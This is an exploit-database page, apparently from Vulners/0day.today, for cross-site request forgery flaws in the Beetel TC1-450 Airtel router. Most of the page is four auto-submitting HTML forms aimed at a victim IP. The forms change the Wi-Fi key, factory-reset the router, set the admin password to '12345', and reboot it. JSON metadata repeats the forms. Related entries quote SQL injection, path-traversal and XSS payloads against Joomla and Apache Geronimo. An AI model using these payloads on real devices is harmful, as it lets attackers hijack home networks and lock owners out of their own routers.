Search...

Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities

2013-12-16T00:00:00

ID 1337DAY-ID-21673
Type zdt
Reporter Samandeep Singh
Modified 2013-12-16T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            Technical Details
~~~~~~~~~~~~~~~~~~
Beetel 450-TC1 Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link.
 
Exploit Code 
~~~~~~~~~~~~~
 
Change Wifi (WPA2/PSK) password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
&lt;html&gt;
&lt;body onload="document.form.submit();"&gt;
&lt;form action="http://[VICTIM_IP]/Forms/home_wlan_1"
method="POST" name="form"&gt;
&lt;input type="hidden" name="wlanWEBFlag" value="0"&gt;
&lt;input type="hidden" name="wlan_APenable" value="1"&gt;
&lt;input type="hidden" name="Countries_Channels" value="[Any Country]"&gt;
&lt;input type="hidden" name="Channel_ID" value="00000000"&gt;
&lt;input type="hidden" name="AdvWlan_slPower" value="High"&gt;
&lt;input type="hidden" name="BeaconInterval" value="100"&gt;
&lt;input type="hidden" name="RTSThreshold" value="2347"&gt;
&lt;input type="hidden" name="FragmentThreshold" value="2346"&gt;
&lt;input type="hidden" name="DTIM" value="1"&gt;
&lt;input type="hidden" name="WirelessMode" value="802.11b+g"&gt;
&lt;input type="hidden" name="WLSSIDIndex" value="1"&gt;
&lt;input type="hidden" name="ESSID_HIDE_Selection" value="0"&gt;
&lt;input type="hidden" name="ESSID" value="[SSID of WLAN]"&gt;
&lt;input type="hidden" name="WEP_Selection" value="WPA2-PSK"&gt;
&lt;input type="hidden" name="wlanWEPFlag" value="0"&gt;
&lt;input type="hidden" name="wlanGEMTEKFlag" value="0"&gt;
&lt;input type="hidden" name="wlanGEMTEKCMDFlag" value="0"&gt;
&lt;input type="hidden" name="wlanGEMTEKDeactiveAPFlag" value="0"&gt;
&lt;input type="hidden" name="wlanRadiusWEPFlag" value="0"&gt;
&lt;input type="hidden" name="TKIP_Selection" value="AES"&gt;
&lt;input type="hidden" name="PreSharedKey" value="[WIFI PASSWORD]"&gt;
&lt;input type="hidden" name="WPARekeyInter" value="0"&gt;
&lt;input type="hidden" name="WDSMode_Selection" value="0"&gt;
&lt;input type="hidden" name="WDSEncryType_Selection" value="TKIP"&gt;
&lt;input type="hidden" name="WDSKey" value=""&gt;
&lt;input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WDSPeer_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLAN_FltActive" value="0"&gt;
&lt;input type="hidden" name="WLAN_FltAction" value="00000000"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="WLANFLT_MAC" value="00:00:00:00:00:00"&gt;
&lt;input type="hidden" name="CountryChange" value="0"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
 
 
Factory Reset Router Settings by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
&lt;html&gt;
&lt;body onload="document.form.submit();"&gt;
&lt;form action="http://[VICTIM_IP]/Forms/tools_system_1"
method="POST" name="form"&gt;
&lt;input type="hidden" name="restoreFlag" value="1"&gt;
&lt;input type="hidden" name="Restart" value="RESTART"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
 
 
Change Router's Admin Password by CSRF
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
&lt;html&gt;
&lt;body onload="document.form.submit();"&gt;
&lt;form action="http://[VICTIM_IP]/Forms/tools_admin_1"
method="POST" name="form"&gt;
&lt;input type="hidden" name="uiViewTools_Password" value="12345"&gt;
&lt;input type="hidden" name="uiViewTools_PasswordConfirm" value="12345"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
 
 
Restart Router by CSRF
~~~~~~~~~~~~~~~~~~~~~~
 
&lt;html&gt;
&lt;body onload="document.form.submit();"&gt;
&lt;form action="http://[VICTIM_IP]/Forms/tools_system_1"
method="POST" name="form"&gt;
&lt;input type="hidden" name="restoreFlag" value="0"&gt;
&lt;input type="hidden" name="Restart" value="RESTART"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;

#  0day.today [2018-02-18]  #

JSON Vulners Source

Initial Source

{"hash": "d01dcc39ebb1e90d54cec0424c7b22959faf8277b6ec064f018d4832c6d25666", "id": "1337DAY-ID-21673", "lastseen": "2018-02-18T17:22:57", "viewCount": 6, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2bebc19b72bd95e98513647d258e7828", "key": "description"}, {"hash": "2afc714b7240ddc0ebdb9877d89c5c74", "key": "href"}, {"hash": "5723a7254c7f56cd82fa73b4ecb3b5c2", "key": "modified"}, {"hash": "5723a7254c7f56cd82fa73b4ecb3b5c2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "250b5c7d37ce433495a90035bdc68054", "key": "reporter"}, {"hash": "34a5f1b926a5cbd95857cbf470730a66", "key": "sourceData"}, {"hash": "f271157494a7eab2da2dc917174e68e6", "key": "sourceHref"}, {"hash": "5f833b8008ef2b037073c60e4e6f18a4", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-02-18T17:22:57"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21673", "SECURITYVULNS:DOC:14108"]}, {"type": "zdt", "idList": ["1337DAY-ID-2346", "1337DAY-ID-2347"]}], "modified": "2018-02-18T17:22:57"}, "vulnersScore": 0.1}, "type": "zdt", "sourceHref": "https://0day.today/exploit/21673", "description": "Exploit for hardware platform in category web applications", "title": "Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities", "history": [{"bulletin": {"hash": "46817bb176f1944a73b1e51c5808c43cfa401b5f97d8367de0eead06a83dacf6", "id": "1337DAY-ID-21673", "lastseen": "2016-04-20T01:14:37", "enchantments": {"score": {"value": 5.7, "modified": "2016-04-20T01:14:37"}}, "hashmap": [{"hash": "f804be2b75f9dafe87d442dd77fe54dd", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5f833b8008ef2b037073c60e4e6f18a4", "key": "title"}, {"hash": "2bebc19b72bd95e98513647d258e7828", "key": "description"}, {"hash": "250b5c7d37ce433495a90035bdc68054", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5723a7254c7f56cd82fa73b4ecb3b5c2", "key": "published"}, {"hash": "e2d3b5e7ee5ef2402b827b89c455aedd", "key": "sourceHref"}, {"hash": "bc0509c57d8aba466102bb2a276dfc96", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5723a7254c7f56cd82fa73b4ecb3b5c2", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/21673", "description": "Exploit for hardware platform in category web applications", "viewCount": 0, "title": "Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "Technical Details\r\n~~~~~~~~~~~~~~~~~~\r\nBeetel 450-TC1 Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link.\r\n \r\nExploit Code \r\n~~~~~~~~~~~~~\r\n \r\nChange Wifi (WPA2/PSK) password by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/home_wlan_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"wlanWEBFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlan_APenable\" value=\"1\">\r\n<input type=\"hidden\" name=\"Countries_Channels\" value=\"[Any Country]\">\r\n<input type=\"hidden\" name=\"Channel_ID\" value=\"00000000\">\r\n<input type=\"hidden\" name=\"AdvWlan_slPower\" value=\"High\">\r\n<input type=\"hidden\" name=\"BeaconInterval\" value=\"100\">\r\n<input type=\"hidden\" name=\"RTSThreshold\" value=\"2347\">\r\n<input type=\"hidden\" name=\"FragmentThreshold\" value=\"2346\">\r\n<input type=\"hidden\" name=\"DTIM\" value=\"1\">\r\n<input type=\"hidden\" name=\"WirelessMode\" value=\"802.11b+g\">\r\n<input type=\"hidden\" name=\"WLSSIDIndex\" value=\"1\">\r\n<input type=\"hidden\" name=\"ESSID_HIDE_Selection\" value=\"0\">\r\n<input type=\"hidden\" name=\"ESSID\" value=\"[SSID of WLAN]\">\r\n<input type=\"hidden\" name=\"WEP_Selection\" value=\"WPA2-PSK\">\r\n<input type=\"hidden\" name=\"wlanWEPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKCMDFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKDeactiveAPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanRadiusWEPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"TKIP_Selection\" value=\"AES\">\r\n<input type=\"hidden\" name=\"PreSharedKey\" value=\"[WIFI PASSWORD]\">\r\n<input type=\"hidden\" name=\"WPARekeyInter\" value=\"0\">\r\n<input type=\"hidden\" name=\"WDSMode_Selection\" value=\"0\">\r\n<input type=\"hidden\" name=\"WDSEncryType_Selection\" value=\"TKIP\">\r\n<input type=\"hidden\" name=\"WDSKey\" value=\"\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLAN_FltActive\" value=\"0\">\r\n<input type=\"hidden\" name=\"WLAN_FltAction\" value=\"00000000\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"CountryChange\" value=\"0\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nFactory Reset Router Settings by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_system_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"restoreFlag\" value=\"1\">\r\n<input type=\"hidden\" name=\"Restart\" value=\"RESTART\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nChange Router's Admin Password by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_admin_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"uiViewTools_Password\" value=\"12345\">\r\n<input type=\"hidden\" name=\"uiViewTools_PasswordConfirm\" value=\"12345\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nRestart Router by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_system_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"restoreFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"Restart\" value=\"RESTART\">\r\n</form>\r\n</body>\r\n</html>\n\n# 0day.today [2016-04-20] #", "published": "2013-12-16T00:00:00", "references": [], "reporter": "Samandeep Singh", "modified": "2013-12-16T00:00:00", "href": "http://0day.today/exploit/description/21673"}, "lastseen": "2016-04-20T01:14:37", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "Technical Details\r\n~~~~~~~~~~~~~~~~~~\r\nBeetel 450-TC1 Wireless Router has a Cross Site Request Forgery Vulnerability in its Web Console. Attacker can easily change Wireless password,Reboot Router, Reset Router,Change Router's Admin Password by simply making the user visit a CSRF link.\r\n \r\nExploit Code \r\n~~~~~~~~~~~~~\r\n \r\nChange Wifi (WPA2/PSK) password by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/home_wlan_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"wlanWEBFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlan_APenable\" value=\"1\">\r\n<input type=\"hidden\" name=\"Countries_Channels\" value=\"[Any Country]\">\r\n<input type=\"hidden\" name=\"Channel_ID\" value=\"00000000\">\r\n<input type=\"hidden\" name=\"AdvWlan_slPower\" value=\"High\">\r\n<input type=\"hidden\" name=\"BeaconInterval\" value=\"100\">\r\n<input type=\"hidden\" name=\"RTSThreshold\" value=\"2347\">\r\n<input type=\"hidden\" name=\"FragmentThreshold\" value=\"2346\">\r\n<input type=\"hidden\" name=\"DTIM\" value=\"1\">\r\n<input type=\"hidden\" name=\"WirelessMode\" value=\"802.11b+g\">\r\n<input type=\"hidden\" name=\"WLSSIDIndex\" value=\"1\">\r\n<input type=\"hidden\" name=\"ESSID_HIDE_Selection\" value=\"0\">\r\n<input type=\"hidden\" name=\"ESSID\" value=\"[SSID of WLAN]\">\r\n<input type=\"hidden\" name=\"WEP_Selection\" value=\"WPA2-PSK\">\r\n<input type=\"hidden\" name=\"wlanWEPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKCMDFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanGEMTEKDeactiveAPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"wlanRadiusWEPFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"TKIP_Selection\" value=\"AES\">\r\n<input type=\"hidden\" name=\"PreSharedKey\" value=\"[WIFI PASSWORD]\">\r\n<input type=\"hidden\" name=\"WPARekeyInter\" value=\"0\">\r\n<input type=\"hidden\" name=\"WDSMode_Selection\" value=\"0\">\r\n<input type=\"hidden\" name=\"WDSEncryType_Selection\" value=\"TKIP\">\r\n<input type=\"hidden\" name=\"WDSKey\" value=\"\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WDSPeer_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLAN_FltActive\" value=\"0\">\r\n<input type=\"hidden\" name=\"WLAN_FltAction\" value=\"00000000\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"WLANFLT_MAC\" value=\"00:00:00:00:00:00\">\r\n<input type=\"hidden\" name=\"CountryChange\" value=\"0\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nFactory Reset Router Settings by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_system_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"restoreFlag\" value=\"1\">\r\n<input type=\"hidden\" name=\"Restart\" value=\"RESTART\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nChange Router's Admin Password by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_admin_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"uiViewTools_Password\" value=\"12345\">\r\n<input type=\"hidden\" name=\"uiViewTools_PasswordConfirm\" value=\"12345\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n \r\nRestart Router by CSRF\r\n~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n<html>\r\n<body onload=\"document.form.submit();\">\r\n<form action=\"http://[VICTIM_IP]/Forms/tools_system_1\"\r\nmethod=\"POST\" name=\"form\">\r\n<input type=\"hidden\" name=\"restoreFlag\" value=\"0\">\r\n<input type=\"hidden\" name=\"Restart\" value=\"RESTART\">\r\n</form>\r\n</body>\r\n</html>\n\n# 0day.today [2018-02-18] #", "published": "2013-12-16T00:00:00", "references": [], "reporter": "Samandeep Singh", "modified": "2013-12-16T00:00:00", "href": "https://0day.today/exploit/description/21673"}

{"zdt": [{"lastseen": "2018-01-02T11:24:22", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-09-19T00:00:00", "published": "2010-09-19T00:00:00", "id": "1337DAY-ID-14108", "href": "https://0day.today/exploit/description/14108", "type": "zdt", "title": "Joomla Component com_restaurantguide Multiple Vulnerabilities", "sourceData": "=============================================================\r\nJoomla Component com_restaurantguide Multiple Vulnerabilities\r\n=============================================================\r\n\r\n# Exploit Title: Joomla Component com_restaurantguide Multiple Vulnerabilities\r\n# Date: 18.09.2010\r\n# Author: Valentin\r\n# Category: webapps/0day\r\n# Version: 1.0.0\r\n \r\n# Tested on: Debian lenny, Apache2, MySQL 5, Joomla 1.5.x\r\n# CVE : \r\n# Code :\r\n \r\n \r\n[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]\r\n>> General Information\r\nAdvisory/Exploit Title = Joomla Component com_restaurantguide Multiple Vulnerabilities\r\nAuthor = Valentin Hoebel\r\nContact = [email\u00a0protected]\r\n \r\n \r\n[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]\r\n>> Product information\r\nName = Restaurant Guide\r\nVendor = Oh-Taek Im\r\nVendor Websites = http://www.photoindochina.com/, http://extensions.joomla.org/extensions/directory-a-documentation/thematic-directory/14054\r\nAffected Version(s) = 1.0.0\r\n \r\n \r\n[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]\r\n>> SQL Injection\r\nindex.php?option=com_restaurantguide&view=country&id='&Itemid=69\r\n(id parameter is vulnerable)\r\n \r\n \r\n>> HTML/JS/VBS Code Injection (all input fields, also in the admin backend)\r\nIt is possible to inject HTML/JS/VBS code into the document although XSS filters are active. Simply end the current HTML tag and convert your code into decimal HTMl code without semicolons:\r\n\"><A HREF=\"http://www.google.com./\">injected</A>\r\n(which is \"><A HREF=\"http://www.google.com./\">injected</A>)\r\nThe code doesn't get parsed, so it is not possible to exploit this weakness. However, including arbitrary plain text into the current website is possible. Dangerous! :D\r\n \r\n \r\n>> Interesting stuff\r\na) Triggering various error messages in the admin panel is possible, e.g.:\r\nadministrator/index.php?option=com_restaurantguide&controller=restaurantitems&task=edit&cid[]=[try ' or -1 or an ID which does not exist]\r\nSometimes the code of the component gets displayed within the browser window when you try to trigger errors with different variables.\r\n \r\nb) Playing around with the controller variable\r\nadministrator/index.php?option=com_restaurantguide&controller=../../../../../../../../../etc/passwd%00\r\n(NOT a LFI vulnerability since the controller classes are defined in the source code, you just get different error messages.. nothing to exploit here..)\r\n \r\n \r\n[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]\r\n>> Additional Information\r\nAdvisory/Exploit Published = 18.09.2010\r\n \r\n \r\n[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]\r\n>> Misc\r\nGreetz = cr4wl3r, JosS, packetstormsecurity.org\r\n \r\n \r\n[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/14108"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "\r\n\r\nOriginal advisory http://dsecrg.com/pages/vul/show.php?id=119\r\n\r\n\r\nDigital Security Research Group [DSecRG] Advisory #DSECRG-09-019\r\n\r\nApplication: Apache Geronimo Application Server\r\nVersions Affected: 2.1 - 2.1.3\r\nVendor URL: http://geronimo.apache.org/\r\nBug: Multiple XSS Vulnerabilities\r\nExploits: YES\r\nReported: 10.12.2008\r\nVendor response: 10.12.2008\r\nSolution: YES \r\nDate of Public Advisory: 16.04.2009\r\nCVE-number: 2009-0038\r\nAuthor: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nGeronimo Server Console multiple XSS vulnerabilities.\r\n\r\nVarious linked and stored cross-site scripting (XSS) vulnerabilities were found in the Apache Geronimo administrative\r\nconsole and related utilities.\r\n\r\nThis affects all full JavaEE Geronimo releases or other distributions which include the administration web console up to\r\nand including Geronimo 2.1.3.\r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\nUsing this vulnerability attacker can steal administrator's cookie and then authentificate as administrator or perform\r\ncertain administrative actions.\r\n\r\n1. Linked XSS vulnerability.\r\n\r\nAttacker can inject XSS in URL string.\r\n\r\nExample:\r\n\r\nhttp://[server]/console/portal/"><script>alert('DSecRG XSS')</script><!--\r\n\r\n\r\n2. Multiple Stored XSS vulnerabilities found in script \r\n\r\n/console/portal/Server/Monitoring\r\n\r\nVulnerable parameters: "name", "ip", "username", "description".\r\n\r\nAttacker can inject scripts into monitorings.\r\n\r\nExample [Monitoring - Create View]:\r\n\r\nname = <script>alert('DSecRG XSS')</script>\r\ndescription = </textarea><script>alert("DSecRG XSS")</script>\r\n\r\nor\r\n\r\nhttp://[server]/console/portal//Server/Monitoring/__ac0x3monitoring0x2monitoring!126896788|0/__pm0x3monitoring0x2monitoring!126896788|0_edit?action=saveAddView&name="><script>alert("DSecRG\r\nXSS")</script>&description=</textarea><script>alert("DSecRG XSS")</script>\r\n\r\n\r\n\r\nSolution\r\n********\r\n\r\nThis s\r\n\r\necurity vulnerabilities fixed in Geronimo 2.1.4 release.\r\n\r\nNew version of Geronimo 2.1.4 can be downloaded from this location:\r\n\r\nhttp://geronimo.apache.org/downloads.html\r\n\r\nAn alternative workaround (if you choose to not upgrade to Apache Geronimo 2.1.4) would be to stop or undeploy the\r\nadministration web console application in the server.\r\n\r\nCredits\r\n*******\r\n\r\nhttp://geronimo.apache.org/21x-security-report.html#2.1.xSecurityReport-214\r\n\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security is leading IT security company in Russia, providing information security consulting, audit and\r\npenetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS\r\nstandards. \r\nDigital Security Research Group focuses on web application and database security problems with vulnerability reports,\r\nadvisories and whitepapers posted regularly on our website.\r\n\r\nContact: research [at] dsecrg [dot] com\r\n http://www.dsecrg.com \r\n http://www.dsec.ru\r\n\r\n\r\nRegards,\r\nDigital Security Research Group [DSecRG]\r\n________________________________________\r\nDIGITAL SECURITY\r\ntel/fax: +7(812)703-1547\r\ntel: +7(812)430-9130\r\ne-mail: research@dsecrg.com\r\nweb: www.dsecrg.com\r\n----------------------------------------\r\nThis message and any attachment are confidential and may be privileged \r\nor otherwise protected from disclosure. If you are not the intended \r\nrecipient any use, distribution, copying or disclosure is strictly \r\nprohibited. If you have received this message in error, please notify \r\nthe sender immediately either by telephone or by e-mail and delete this \r\nmessage and any attachment from your system. Correspondence via e-mail \r\nis for information purposes only. Digital Security neither makes nor \r\naccepts legally binding statements by e-mail unless otherwise agreed. \r\n----------------------------------------", "modified": "2009-04-17T00:00:00", "published": "2009-04-17T00:00:00", "id": "SECURITYVULNS:DOC:21673", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21673", "title": "[DSECRG-09-019] Apache Geronimo - XSS vulnerabilities.txt", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:32", "bulletinFamily": "software", "description": "Crossite scripting, directory traversal.", "modified": "2009-04-17T00:00:00", "published": "2009-04-17T00:00:00", "id": "SECURITYVULNS:VULN:9843", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9843", "title": "Apache Geronimo multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "description": "TITLE:\r\nIBM AIX dtterm Privilege Escalation Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA21673\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/21673/\r\n\r\nCRITICAL:\r\nLess critical\r\n\r\nIMPACT:\r\nPrivilege escalation\r\n\r\nWHERE:\r\nLocal system\r\n\r\nOPERATING SYSTEM:\r\nAIX 5.x\r\nhttp://secunia.com/product/213/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in IBM AIX, which can be exploited\r\nby malicious, local users to gain escalated privileges.\r\n\r\nThe vulnerability is caused due to an unspecified error in dtterm and\r\nallows execution of arbitrary code with root privileges.\r\n\r\nSOLUTION:\r\nApply APARs.\r\n\r\nAIX 5.3:\r\nApply APAR IY89052.\r\n\r\nAIX 5.2:\r\nApply APAR IY89045.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by the vendor.\r\n\r\nORIGINAL ADVISORY:\r\nIBM:\r\nhttp://www-1.ibm.com/support/docview.wss?uid=isg1IY89052\r\nhttp://www-1.ibm.com/support/docview.wss?uid=isg1IY89045\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.", "modified": "2006-08-31T00:00:00", "published": "2006-08-31T00:00:00", "id": "SECURITYVULNS:DOC:14108", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14108", "title": "[SA21673] IBM AIX dtterm Privilege Escalation Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}